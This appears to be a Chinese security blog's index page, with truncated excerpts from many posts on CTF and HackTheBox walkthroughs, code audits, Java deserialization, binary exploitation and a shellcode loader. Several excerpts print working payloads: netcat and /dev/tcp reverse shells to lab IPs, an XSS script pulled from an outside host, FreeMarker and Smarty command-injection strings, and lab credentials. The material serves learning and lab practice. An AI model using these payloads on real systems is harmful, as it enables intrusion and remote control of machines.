Y4tacker的博客

文章目录对Java反序列化脏数据绕WAF新姿势的补充写在前面引言为什么这里第一个属性反序列化失败，仍然触发了URLDNS的整个过程灵感大发对Java反序列化脏数据绕WAF新姿势的补充@Y4tacker写在前面这篇文章其实很久前也更新到我博客了还是懒，还是搬过来吧，这里再发一次：https://y4tacker.github.io/引言相信大家都看过回忆飘如雪大师傅的一篇文章，Java反序列化数据绕WAF之加大量脏数据，在这篇文章当中大师傅提出了通过将gadget加入到集合类型从而可以实现添加脏数

文章目录写在前面拿下webshell简单信息搜集CS上线继续信息搜集提权攻击域-接管整个域完结撒花写在前面无聊，再玩一个靶场，顺便记录下，也学了一些新东西拿下webshell打开网站以后发现是个php探针，没啥意义，除了试一试弱口令同时使用dirsearch扫描发现有phpmyadmin，尝试为弱口令root\root查询SHOW VARIABLES LIKE "%SECURE%"发现配置未开启，那么不能使用into outfile写马进去

文章目录环境来源为什么写这篇文章配置nmap扫描启动smbserver共享文件服务打爆weblogic提权使用 procdump64+mimikatz 获取 win 用户明文密生成管理帐号密码用户凭证-连接域控服务器-反弹域控 shel参考文章环境来源来源于https://mp.weixin.qq.com/s/uLlWJdcAc6MmUyuruHygNA，尊重人家作者，还是自己去问人家要吧为什么写这篇文章给一些不必要细节删除，以及一些自己觉得细节的补充配置nmap扫描常用端口是开放状态1

文章目录写在前面脚本写在前面网上一堆水文章，看我脚本再理解下就行了，省略分析步骤脚本import osimport timeimport randomimport sysfrom io import BytesIOimport requestsimport base64import refrom urllib.parse import quotePY2 = True if sys.version_info.major == 2 else Falsedef force_byt

文章目录SpELSpEL注入SpEL我们学安全主要了解那些对我们有用的东西，在这里有一篇链接方便大家进行了解https://www.jianshu.com/p/e0b50053b5d3此外，我觉得其中最重要的是通过 T() 调用一个类的静态方法，它将返回一个 Class Object，然后再调用相应的方法或属性：，并且如果包在java.lang下面可以省略这一部分，因此我们便可以利用此方法调用Runtime执行命令SpEL注入在org/joychou/controller/SpEL.java下面，

文章目录ShieldShield扫描文件神奇的出来个这个扫描发现存在wordpress站点用admin/P@s5w0rd!成功登陆后台发现存在漏洞的后面发现可以直接用msf来利用，完美的换个目录方便我上传文件接下来cd C:/inetpub/wwwroot/wordpress/wp-content/uploads刚刚发现文件放错地方了重新来一下执行execute -f nc.exe -a "-e cmd.exe 10.10.14.8 1234"成功接收到shell

文章目录VaccineVaccine首先nmap -sC -sV 10.10.10.46发现前台是一个登陆界面，尝试ftp登录ftpuser / mc@F1l3ZilL4输入dir拿到源码尝试下载通过爆破得到密码741852963拿到源码拿到2cb42f8734ea607eefed3b70af13bbd3去尝试md5撞库成功进入后台发现存在sql注入这里很容易猜测到如果是只通过sql那一定是通过udf提权，直接sqlmap一把梭输入bash -c 'bash -

文章目录OopsieOopsie首先跳过nmap扫描的过程，现在我们直接开始日，发现了http://10.10.10.28/cdn-cgi/login/admin.php用admin和MEGACORP_4dm1n!!这里存在一个水平越权的漏洞，具体不给出分析了，看cookie都懂垂直越权后发现存在文件上传点这里来反弹一个shell<?phpexec("/bin/bash -c 'bash -i &> /dev/tcp/10.10.14.166/4444 0&lt

文章目录写在前面javacon写在前面在P神星球看到的，这里学习一下，文件在https://www.leavesongs.com/media/attachment/2018/11/23/challenge-0.0.1-SNAPSHOT.jarjavacon运行的时候利用java -jar challenge-0.0.1-SNAPSHOT.jar首先查看配置首先在登录页面，在login页面post接收参数，与配置当中的比对，成功则设置cookie@PostMapping({"/login"})

文章目录工具介绍smbclientpsexecArchetype工具介绍smbclientSmbclient(samba client)是基于SMB协议的,用于存取共享目标的客户端程序。参数：网络资源 网络资源的格式为//服务器名称/资源分享名称。密码 输入存取网络资源所需的密码。-B 传送广播数据包时所用的IP地址。-d< 排错层级> 指定记录文件所记载事件的详细程度。-E 将信息送到标准错误输出设备。-h 显示帮助。-i< 范围> 设置NetBIOS名称范围

文章目录写在前面ret2syscall参考文章写在前面今天再冲一个就歇息了ret2syscallRet2Syscall，即控制程序执行系统调用，进而获取shell老规矩checksec可以看出，源程序为 32 位，开启了 NX 保护。接下来利用 IDA 来查看源码，存在栈溢出分析偏移可以推断s 的地址为0xffffd16cs 相对于 ebp 的偏移为0x6cs 相对于返回地址的偏移为 0x6c+4我们利用如下系统调用来获取 shellexecve("/bin/sh",NU

文章目录写在前面ret2shellcode利用原理利用关键例题参考文章写在前面懒狗的第二篇学习，开冲ret2shellcode利用原理ret2shellcode，即控制程序执行 shellcode 代码。一般来说，shellcode 需要我们自己填充。这其实是另外一种典型的利用方法，即此时我们需要自己去填充一些可执行的代码。在栈溢出的基础上，要想执行 shellcode，需要对应的 binary 在运行时，shellcode 所在的区域具有可执行权限。利用关键1、程序存在溢出，并且还要能够控

https://zhuanlan.zhihu.com/p/73428357https://blog.csdn.net/further_eye/article/details/109718241https://www.freebuf.com/vuls/208339.html

文章目录写在前面前置小知识bss段data段text段heapstackret2text参考链接写在前面已经学了一小段时间二进制了，以后慢慢确定一个深入的方向吧，开冲前置小知识bss段bss段（bss segment）通常是指用来存放程序中未初始化的全局变量的一块内存区域。bss是英文Block Started by Symbol的简称。bss段属于静态内存分配。比如int a;data段数据段（data segment）通常是指用来存放程序中已初始化的全局变量的一块内存区域。数据

文章目录前言SSRF修复方式前言今天预览版把我电脑搞崩了破防了CPU占用率100%，还好可以回滚版本，当然虽然是最简单的漏洞，但是底层代码我也觉得值得学习，一切从0开始SSRF其实闭着眼睛都知道支持file协议但是我还是想要分析一下漏洞点位于org/joychou/controller/SSRF.java下跟进这个URLConnection方法他把url参数首先传入构造函数里，接着调用openConnection方法很明显我们传入参数不满足上面条件进入else循环调用构造函数

文章目录前言path_traversal@RestController路径穿越修复方法前言期末考试周了，学了一天密码学，累死了，我的Java也要开始一点本文章代码来源于Java-sec-code项目path_traversal首先我们在org/joychou/controller/PathTraversal.java路径下面，首先最上方有一个大大的@RestController@RestController这是在Spring4之后新加入的注解，原来返回json需要@ResponseBody和@

文章目录写在前面EmlogSQL注入注入点1注入点2注入点3文件上传漏洞利用点1任意文件删除漏洞任意文件删除1任意文件删除2(一不小心发现个洞交CNVD了)漏洞太多了就这样了，躺平了写在前面随便花了点时间读完了代码，看了很多页面，至少前台也是比较安全的，主要是测试了sql注入xss之类的，那么就去后台看看，作者还是比较有水平的，蛮细心的；节约时间，不带师傅们从起点分析过滤啥的，有用到再提，本篇算是一次随意的审计练习吧！也算是带师傅们踏入一次简单的审计之旅！当然可能也有遗漏的漏洞，毕竟是自己审计出来的

文章目录写在前面漏洞演示漏洞点分析写在前面考虑到是后台，且后台目录随机，感觉危害不太大，所以分享思路，这里是防御过度造成的，两个waf的利用导致参数逃逸，希望给大家的审计学习带来帮助漏洞演示漏洞点在后台的图片水印设置在这里我们用burpSuite拦截包，之后我们要修改三个地方，我把参数列出来------WebKitFormBoundaryiU3RjTlx8jjXvZLMContent-Disposition: form-data; name="photo_watertext"www.se

文章目录写在前面前置TransformerTransformedMapChainedTransformerInvokerTransformerConstantTransformer简化的CC链(来自P神代码审计知识星球)参考链接写在前面仅仅只是前置知识，感谢P神，让我接触到了新的东西，下面是P神的知识星球https://govuln.com/?page=4前置要了解这个链子，必须要知道下面几个TransformerTransformer能看到这是一个接口，有一个待实现的方法Transformer

文章目录写在前面分析写在前面本着学习为主的原则，再考虑到利用难度，这里便公开分享挖掘的思路了分析尽管这个CMS大部分地方都适用了自带的frparam方法来获取参数，这个函数对我们传入的参数进行了过滤，但不妨有开发者大意的情况，比如下面这个情况就是漏洞点在于后台的插件配置处,随便安装一个插件，点击配置抓包，其默认为GET请求但我们跟踪一下底层的代码，在A/c/PluginsController.php下的setconf函数，这里直接将$_POST传入在A/exts/jizhicmsupdat

文章目录Java序列化与反序列化写在前面序列化与反序列化实现序列化条件简单的例子参考文章Java序列化与反序列化写在前面最近在学习Java方面的内容，很头疼，函数那些啥的也太多了吧！！！自闭序列化与反序列化把对象转换为字节序列的过程称为对象的序列化。把字节序列恢复为对象的过程称为对象的反序列化。在我看来这两个过程就是为了对对象状态的保存便于恢复，不太准确，至少现在这么认为；Java的反序列化主要是靠readObject方法,之前有学过PHP的反序列化，对比Java与PHP反序列化的过程，我认为

文章目录写在前面DockerhubWp写在前面太惨了，太傻了我，迷迷糊糊写了两天CMS，又累又自闭，还搞错了东西，给各位大师傅们道歉了，下面大师傅们要是瞧得上的化就那啥可以复现复现Dockerhubdocker pull y4tacker/ez_yxcms:1.0随便写个docker-compose.ymlversion: "2"services: web: build: . image: yyds restart: always ports:

文章目录结果分析利用链(来自ysoserial)生成链反序列化参考链接结果成功触发分析利用链(来自ysoserial)* HashMap.readObject()* HashMap.putVal()* HashMap.hash()* URL.hashCode()生成链反序列化参考链接https://zhuanlan.zhihu.com/p/149416105https://www.cnblogs.com/v1ntlyn/p

文章目录写在前面POP链1POP链2分析写在前面最近倒是不知道干些啥，有点迷茫的状态，不过每天都保持学习就好了，今天空下来了准备写一篇刚学的POP链分析POP链1<?phpnamespace yii\db;class BatchQueryResult extends \yii\base\BaseObject{ private $_dataReader; public function __construct() { $this->_dataRe

文章目录写在前面分析写在前面闲来无事，分析着玩分析根据今日撇脚水平，知道了命令注入一般就是表达式注入或者模板注入吧，因此我们直接取pom.xml里面找一下，找到了freemarker网上一搜还真有模板注入，点我直达下面就是去找利用点了，这里我以index.html为例输入<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}或者<#assign val

文章目录写在前面分析写在前面今天分析的第二篇，当时在网上看到爆了这个漏洞那么就分析一下啦网上似乎没有人写，那就让本小可爱来吧分析漏洞点存在于后台的模板文件查看处漏洞函数位于com/ofsoft/cms/admin/controller/cms/TemplateController.java下的getTemplates函数，首先是接收这三个参数，当时是get传参方式//当前目录 String dirName = getPara("dir",""); //上级目录String upDir

前言这篇wp主要以引导为主，拒绝无脑抄web486简简单单目录穿越http://81db964b-a4d8-42eb-bc64-b31e47af7fde.chall.ctf.show:8080/index.php?action=…/flagweb487首页adction能够读取代码，我读完了所有代码发现只有http://81db964b-a4d8-42eb-bc64-b31e47af7fde.chall.ctf.show:8080/index.php?action=…/index里面代码游泳

文章目录前言web517web518web519web520web521web522web523web524web525web526web527web528web529web530web531web532web533web534web535web536web537web538web539web540前言由于都是简单题就随便写了，SQL注入不懂的百度先学最基本的吧web517注意flag不在当前security里union select group_concat(schema_name) from

@Author：Y4tacker文章目录python-shellcode加载器流程函数介绍VirtualAllocRtlMoveMemoryCreateThreadWaitForSingleObject实战python-shellcode加载器主要是利用ctypes库来调用windows的api来完成加载shellcode的操作流程将shellcode加载进内存并执行函数介绍VirtualAlloc申请内存调用VirtualAlloc函数，来申请一块动态内存区域。VirtualAlloc函数

第一届四叶草网络安全学院牛年CTF大赛WRITEUP队伍信息战队名称战队成员姓名：Firebasky、Y4tacker、lastsward、atao、m1n9yu3解题情况战队排名答题情况WebWebGET首先传?flag=1，发现似乎是smarty，测试{$smarty.version}，成功过滤cat，用tac发现是smarty注入简单了那就flag={if passthru(“tac fl*”)}{/if}即可获得flagWEBsite首先打开页面看到接收url参数，是ssrf考

[HITCON 2016]Leaking沙箱逃逸学习node.js 里提供了 vm 模块，相当于一个虚拟机，可以让你在执行代码时候隔离当前的执行环境，避免被恶意代码攻击。但是这道题比较有意思考点是：node.js中VM2沙箱逃逸JS通过Buffer 类处理二进制数据的缓冲区首先给出了题目的源码"use strict";var randomstring = require("randomstring");var express = require("express");var {

文章目录说在前面Web396(下面其实有通杀的但是得多试试其他的)Web397-Web401Web402We4b03Web404web405Web406Web407Web408Web409web410web411web412web413web414web415web416Web417web418web419web420web421-422web423web424-web431web432web433web434web435-436web437-438web439-440web441web442web443w

文章目录[ACTF2020 新生赛]Include[ACTF2020 新生赛]Exec[ACTF2020 新生赛]Upload[ACTF2020 新生赛]BackupFile[ACTF2020 新生赛]Include打开环境，点击tips出现Can you find out the flag?观察到浏览器url的后缀变化?file=flag.php因此不难得到，应该用伪协议进行编码读取http://a7631c34-a214-4e36-9184-e1957ecc34c6.node3.buuo

文章目录前言web334web335web336方法一方法二方法三web337前言nodejs从入门到挖坟，今天早上刚刚学了一点，成功了，比较开心web334下载源码下来在user.js里面发现了用户名和密码，群主比较坑哈，搞了个大写，明明是小写，ctfshow与密码我忘了压缩包懒得下web335一道Node.JS的RCE之后cat fl00g.txt即可web336方法一先用上一题paylaod尝试绕过姿势，也不行那么试一下读取下文件呢，看看过滤了啥,通过全局变量读取当前目

web316http://e6e20854-17e6-4e0e-9f6f-b3c7e176250c.chall.ctf.show/?msg=%3Cscript+src%3D%22http%3A%2F%2Fy4tacker.top%2Fhack.js%22%3E%3C%2Fscript%3Eweb317-319http://35ac8af3-3eaa-4b9c-98cc-0b78d38e6706.chall.ctf.show/?msg=%3Cinput+onfocus%3Deval%28atob%28t

这里写自定义目录标题前言http走私攻击本题需要重点关注的析构函数SoapCLient+CRLF代码审计参考文章前言如果在代码审计中有反序列化点，但在代码中找不到pop链，可以利用php内置类来进行反序列化http走私攻击关于http走私攻击和实战大家可以参考下这篇文章：https://xz.aliyun.com/t/6654#toc-3本题需要重点关注的析构函数__call 在对象中调用一个不可访问方法时调用在这道题中$vip->getFlag();因为调用了类中没有的方法所以会导致_

文章目录前言web254-web256web257前言新的篇章师傅们加油鸭web254-web256有空补上web257代码审计，魔法函数__construct当对象被创建的时候自动调用，对对象进行初始化。当所有的操作执行完毕之后，需要释放序列化的对象，触发__destruct()魔术方法<?phperror_reporting(0);highlight_file(__FILE__);class ctfShowUser{ private $username='xxxxx

文章目录前言给你shell前言学习网上各大佬的姿势进行学习，很开心给你shell审查元素，发现关键信息①<!--flag is in /flag.txt-->②<a href='./?view_source'下面进行最枯燥的代码审计环节啦~~<?phperror_reporting(0);include "config.php";//这句话没啥用跳过if (isset($_GET['view_source'])) { show_source(__FI

注：第一个学习和接触的Windows漏洞文章目录本机实验环境前置知识漏洞原理漏洞介绍漏洞验证解决方法基本流程介绍详细步骤截图本机实验环境虚拟机：VMware Workstation 14 pro操作系统：Windows10前置知识1、cmd工具路径c:\windows\system32\cmd，按五次shift默认调用同目录下sethc文件,其路径为“c:\windows\system32\sethc.exe”2、用户/账户密码存储位置c:\windows\system32\config\

文章目录漏洞影响的版本漏洞利用方法演示漏洞复现案例代码正常效果修改参数后的效果漏洞影响的版本从官网得知PHP5 < 5.6.25PHP7 < 7.0.10漏洞利用方法若在对象的魔法函数中存在的__wakeup方法，那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法，但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行演示可能上面说的有点抽象就拿我今天遇到一道题来做个案例,运行下图<?phpcla